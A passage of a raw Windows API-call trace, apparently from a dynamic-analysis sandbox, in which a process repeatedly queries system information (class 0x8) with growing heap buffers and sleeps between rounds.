[0224.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.969] Sleep (dwMilliseconds=0x110) [0224.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.988] Sleep (dwMilliseconds=0x110) [0225.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.003] Sleep (dwMilliseconds=0x110) [0225.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.019] Sleep (dwMilliseconds=0x110) [0225.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.036] Sleep (dwMilliseconds=0x110) [0225.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.052] Sleep (dwMilliseconds=0x110) [0225.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.066] Sleep (dwMilliseconds=0x110) [0225.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.083] Sleep (dwMilliseconds=0x110) [0225.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.098] Sleep (dwMilliseconds=0x110) [0225.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.110] Sleep (dwMilliseconds=0x110) [0225.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.133] Sleep (dwMilliseconds=0x110) [0225.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.143] Sleep (dwMilliseconds=0x110) [0225.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.158] Sleep (dwMilliseconds=0x110) [0225.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.315] Sleep (dwMilliseconds=0x110) [0225.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, 